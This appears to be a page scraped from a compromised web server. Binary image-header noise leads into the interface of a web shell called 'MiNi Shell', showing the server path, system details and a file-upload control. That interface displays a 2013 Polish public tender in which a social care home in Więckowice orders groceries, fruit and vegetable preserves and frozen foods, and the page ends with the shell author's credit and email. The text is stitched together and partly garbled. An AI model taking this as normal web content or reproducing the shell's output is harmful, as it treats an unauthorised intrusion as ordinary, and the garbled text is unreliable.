JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131126/252069-N-2013.html

<p class="kh_header"><b>Bolechowice: Dostawy:
-artykułów spożywczych,
-przetworów owocowych i warzywnych,
-mrożonek</b><br>
<b>Numer ogłoszenia: 252069 - 2013; data zamieszczenia: 26.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , Więckowice, ul. Słoneczna 3, 32-082 Bolechowice, woj. małopolskie, tel. 12 2851603, faks 12 2852010.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpswieckowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy:
-artykułów spożywczych,
-przetworów owocowych i warzywnych,
-mrożonek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawy
artykułów spożywczych,
przetworów owocowych i warzywnych,
mrożonek
Andruty-wafle cukrzycowe op. do 110g	kg	72
Budyń bez cukru  śmietankowy op. do 1000g	kg	70
Budyń bez cukru  czekoladowy
 op. do 1000g		70
Bulion drobiowy Winiary op. do 2 kg	kg	6
Chrupki krakowskie a 350 g	szt. 	210
Ciastka deserowe	kg	120
Ciastka Grześki w czekoladzie a 39 g.	kg.	52
Ciastka herbatniki szkolne	kg	150
Ciastka krakersy op. 180 g	kg	15
Cukier a 1 kg	kg	2450
Cukier puder a 0,5 kg	kg	110
Cukier waniliowy op. do 1 kg	kg	5
Cukierki w czekoladzie - mieszanka krakowska	kg	30
Cynamon op. do 100g	kg	1,5
Czekolada dla diabetyków a 100 g	kg.	13,5
Czosnek granulowany op. do 1 kg	kg	12
Drożdże piekarskie a 100 g	kg	7
Galaretka owocowa op. do
 1 kg	kg	200
Herbata ekspres. owoc. Vitax op. po 20 szt.	op.	265
Herbata liściasta Madras op.
do 1 kg	kg	100
Kakao Wawel op do 0,5 kg	kg	14
Kasza jęczmienna op. do 1 kg	kg	150
Kasza manna op. do 1 kg	kg	115
Kawa zbożowa op. do 1 kg	kg	130
Ketchup Roleski op. do 0,5 kg	kg	174
Kisiel bez cukru op. do 1 kg	kg	120
Kleik ryżowy błyskawiczny 
a 200 g	kg	3
Kminek	kg	1
Konserwa rybna śledź w pomidorach op. do 200 g	kg	60
Konserwa rybna śledź w oleju op. do 200 g	kg	60
Kwasek cytrynowy op. do 1 kg	kg	14
Liście laurowe 	kg	1,2
Majeranek 	kg	0,6
Majonez Roleski op. do 1 kg	kg	320
Makaron drobny 4-ro jajeczny
op. do 1 kg	kg	160
Makaron nitki 4-ro jajeczny op. do 1 kg	kg	110
Makaron różny 4-ro jajeczny op. do 1 kg	kg	650
Makrela wędzona	kg	180
Mąka pszenna tortowa op.
 do 1 kg typ 450	kg	2000
Mąka ziemniaczana op. do
 1 kg	kg	110
Miód naturalny wielokwiatowy op. do 400g	kg	30
Musztarda kremowa Roleski op. do 0,5 kg	kg	30
Ocet 10 % op. do 0,5 l	l	25
Oregano op do 50 g	kg	0,5
Olej Kujawski op. do 1 l	l	415
Paluszki słone Lajkonik op do
300 g	kg 	165
Pieprz czarny mielony op. do 1 kg	kg	13
Płatki kukurydziane Corn Flakes op. do 1 kg b/dodatków
kg 50                                                                                          
Płatki owsiane op. do 1 kg	kg	63
Proszek do pieczenia op. do 50 g	kg	1,5
Przyprawa do drobiu Kamis op. do 1 kg	kg	3
Przyprawa do mięsa Kamis op. do 1 kg	kg	1,5
Przyprawa do potraw
  Kucharek op. do 1 kg	kg	75
Przyprawa w płynie do zup Winiary a 1 l	l	210
Rodzynki op. do 1 kg	kg	36
Ryż op. do 1 kg	kg	390
Sól kuchenna jodowana op. do 1 kg	kg	630
Śledzie solone Matjas op. do 5 kg po odcieku 4 kg	kg	165
Śmietanka śnieżka op. do 60 g	kg	22
Śliwki suszone bez pestek op do 250g	kg	6
Wiórka kokosowe op. do 100 g	kg	10
Ziele angielskie op. do 1 kg	kg	2,5
Żelatyna spożywcza 
op. do 1 kg	kg	35
Barszcz biały op. do 0,5 l	l	140
Barszcz czerwony koncentrat Krakus op do 0,5 l.	l	115
Brzoskwinie w syropie a 850g	szt.	20
Chrzan tarty Polonaise op. do 250 g.	kg	125
Dżem niskosłodzony op. do 400 g.	kg	420
Groszek konserwowy op. do 400 g.	kg	150
Koncentrat pomidorowy 30% Pudliszki op. do 1 kg	kg	240
Kukurydza konserwowa a 400 g.	kg	180
Marmolada op. do 1 kg	kg	6
Papryka konserwowa czerwona 
op do 1 l.	kg	300
Pieczarki marynowane op do 1 l	kg	180
Sałatka szwedzka op do 1 l.	kg	200
Sałatka z czerwonej kapusty op do 1 l.	kg	227
Sok 100 % TYMBARK op. do 250 ml. różne smaki	L	200
Sok 100 % TYMBARK czarna porzeczka  a 1 l.	L	350
Sok 100 % TYMBARK pomarańcz  a 1 l.	L	300
Sok 100 % TYMBARK jabłkowy  a 1 l.	L	300
Sok 100 % TYMBARK wieloowocowy  a 1 l.	L	350
Sok syrop op. do 0,5 l. malinowy	L	150
Borówki opak. do 2,5 kg	kg	70
Brukselka mrożona op do 2,5 kg	kg	85
Fasola szparagowa mrożona żółta op. do2,5 kg	kg	100
Fasola szparagowa mrożona zielona op. do2,5 kg	kg	155
Filet z mintaja mrożony op. do 10 kg do 10% glazury	kg	720
Groszek zielony mrożony op. do 2,5 kg	kg	95
Kalafior mrożony op. do 2,5 kg	kg	230
Lody wielosmakowe op. do 150 g	l	115
Mieszanka kompotowa mrożona 5-cio składnikowa op. do 10 kg	kg	2220
Szpinak mrożony mielonyop. do 2,5 kg	kg	240
Śl Śliwy mroż. bez pestek op. do 2,5 kg	kg	240
Truskawki mrożone op. do 2,5 kg	kg	270.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.33.00.00-0, 15.30.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie pobiera się</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpswieckowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Domu Pomocy Społecznej w Więckowicach ul. Słoneczna 3,
32-082 Bolechowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2013 godzina 10:00, miejsce: Dom Pomocy Społecznej w Więckowicach ul. Słoneczna 3,
32-082 Bolechowice, w pokoju Działu Administracyjno - Gospodarczym 
w pawilonie D.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy artykułów spożywczychAndruty-wafle cukrzycowe op. do 110g
kg72
Budyń bez cukru  śmietankowy op. do 1000g	kg	70
Budyń bez cukru  czekoladowy
 op. do 1000g		70
Bulion drobiowy Winiary op. do 2 kg	kg	6
Chrupki krakowskie a 350 g	szt. 	210
Ciastka deserowe	kg	120
Ciastka Grześki w czekoladzie a 39 g.	kg.	52
Ciastka herbatniki szkolne	kg	150
Ciastka krakersy op. 180 g	kg	15
Cukier a 1 kg	kg	2450
Cukier puder a 0,5 kg	kg	110
Cukier waniliowy op. do 1 kg	kg	5
Cukierki w czekoladzie - mieszanka krakowska	kg	30
Cynamon op. do 100g	kg	1,5
Czekolada dla diabetyków a 100 g	kg.	13,5
Czosnek granulowany op. do 1 kg	kg	12
Drożdże piekarskie a 100 g	kg	7
Galaretka owocowa op. do
 1 kg	kg	200
Herbata ekspres. owoc. Vitax op. po 20 szt.	op.	265
Herbata liściasta Madras op.
do 1 kg	kg	100
Kakao Wawel op do 0,5 kg	kg	14
Kasza jęczmienna op. do 1 kg	kg	150
Kasza manna op. do 1 kg	kg	115
Kawa zbożowa op. do 1 kg	kg	130
Ketchup Roleski op. do 0,5 kg	kg	174
Kisiel bez cukru op. do 1 kg	kg	120
Kleik ryżowy błyskawiczny 
a 200 g	kg	3
Kminek	kg	1
Konserwa rybna śledź w pomidorach op. do 200 g	kg	60
Konserwa rybna śledź w oleju op. do 200 g	kg	60
Kwasek cytrynowy op. do 1 kg	kg	14
Liście laurowe 	kg	1,2
Majeranek 	kg	0,6
Majonez Roleski op. do 1 kg	kg	320
Makaron drobny 4-ro jajeczny
op. do 1 kg	kg	160
Makaron nitki 4-ro jajeczny op. do 1 kg	kg	110
Makaron różny 4-ro jajeczny op. do 1 kg	kg	650
Makrela wędzona	kg	180
Mąka pszenna tortowa op.
 do 1 kg typ 450	kg	2000
Mąka ziemniaczana op. do
 1 kg	kg	110
Miód naturalny wielokwiatowy op. do 400g	kg	30
Musztarda kremowa Roleski op. do 0,5 kg	kg	30
Ocet 10 % op. do 0,5 l	l	25
Oregano op do 50 g	kg	0,5
Olej Kujawski op. do 1 l	l	415
Paluszki słone Lajkonik op do
300 g	kg 	165
Pieprz czarny mielony op. do 1 kg	kg	13
Płatki kukurydziane Corn Flakes op. do 1 kg b/dodatków
kg 50                                                                                
Płatki owsiane op. do 1 kg	kg	63
Proszek do pieczenia op. do 50 g	kg	1,5
Przyprawa do drobiu Kamis op. do 1 kg	kg	3
Przyprawa do mięsa Kamis op. do 1 kg	kg	1,5
Przyprawa do potraw
  Kucharek op. do 1 kg	kg	75
Przyprawa w płynie do zup Winiary a 1 l	l	210
Rodzynki op. do 1 kg	kg	36
Ryż op. do 1 kg	kg	390
Sól kuchenna jodowana op. do 1 kg	kg	630
Śledzie solone Matjas op. do 5 kg po odcieku 4 kg	kg	165
Śmietanka śnieżka op. do 60 g	kg	22
Śliwki suszone bez pestek op do 250g	kg	6
Wiórka kokosowe op. do 100 g	kg	10
Ziele angielskie op. do 1 kg	kg	2,5
Żelatyna spożywcza 
op. do 1 kg	kg	35.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy przetworów owocowych i warzywnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy przetworów owocowych i warzywnychBarszcz biały op. do 0,5 l	l	140
Barszcz czerwony koncentrat Krakus op do 0,5 l.	l	115
Brzoskwinie w syropie a 850g	szt.	20
Chrzan tarty Polonaise op. do 250 g.	kg	125
Dżem niskosłodzony op. do 400 g.	kg	420
Groszek konserwowy op. do 400 g.	kg	150
Koncentrat pomidorowy 30% Pudliszki op. do 1 kg	kg	240
Kukurydza konserwowa a 400 g.	kg	180
Marmolada op. do 1 kg	kg	6
Papryka konserwowa czerwona 
op do 1 l.	kg	300
Pieczarki marynowane op do 1 l	kg	180
Sałatka szwedzka op do 1 l.	kg	200
Sałatka z czerwonej kapusty op do 1 l.	kg	227
Sok 100 % TYMBARK op. do 250 ml. różne smaki	L	200
Sok 100 % TYMBARK czarna porzeczka  a 1 l.	L	350
Sok 100 % TYMBARK pomarańcz  a 1 l.	L	300
Sok 100 % TYMBARK jabłkowy  a 1 l.	L	300
Sok 100 % TYMBARK wieloowocowy  a 1 l.	L	350
Sok syrop op. do 0,5 l. malinowy	L	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy mrożonek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy mrożonek Borówki opak. do 2,5 kg	kg	70
Brukselka mrożona op do 2,5 kg	kg	85
Fasola szparagowa mrożona żółta op. do2,5 kg	kg	100
Fasola szparagowa mrożona zielona op. do2,5 kg	kg	155
Filet z mintaja mrożony op. do 10 kg do 10% glazury	kg	720
Groszek zielony mrożony op. do 2,5 kg	kg	95
Kalafior mrożony op. do 2,5 kg	kg	230
Lody wielosmakowe op. do 150 g	l	115
Mieszanka kompotowa mrożona 5-cio składnikowa op. do 10 kg	kg	2220
Szpinak mrożony mielonyop. do 2,5 kg	kg	240
Śl Śliwy mroż. bez pestek op. do 2,5 kg	kg	240
Truskawki mrożone op. do 2,5 kg	kg	270.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com